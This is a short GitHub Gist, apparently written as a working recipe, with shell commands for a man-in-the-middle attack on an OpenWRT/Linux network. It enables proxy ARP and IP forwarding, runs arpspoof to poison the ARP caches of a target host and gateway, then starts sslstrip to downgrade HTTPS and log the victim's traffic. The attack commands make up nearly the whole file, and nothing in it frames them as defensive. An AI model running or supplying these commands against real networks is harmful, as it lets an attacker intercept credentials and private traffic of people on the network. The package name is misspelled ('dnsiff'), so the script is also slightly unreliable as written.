Created
October 8, 2023 13:30
-
-
Save suuhm/6f1bd5f1a2982aa2dfff8c4b7a0c674c to your computer and use it in GitHub Desktop.
OpenWRT - ARP Spoofing and setup SSLStrip
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# SET PROXY-ARP | |
# ------------- | |
echo 1 > /proc/sys/net/ipv4/conf/eth0.1/proxy_arp | |
# Check with ARPPING | |
# ------------------ | |
apt install arping | |
arping 203.0.113.114 -i eth0 | |
# START ARP SPOOFING | |
# ------------------ | |
apt install dnsiff | |
echo 1 > /proc/sys/net/ipv4/ip_forward | |
arpspoof -i eth0 -t 203.0.113.114 -r 10.0.1.1 | |
# SSLTRIP | |
# ------- | |
sslstrip -l 8080 | |
tail -f sslstrip.log |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment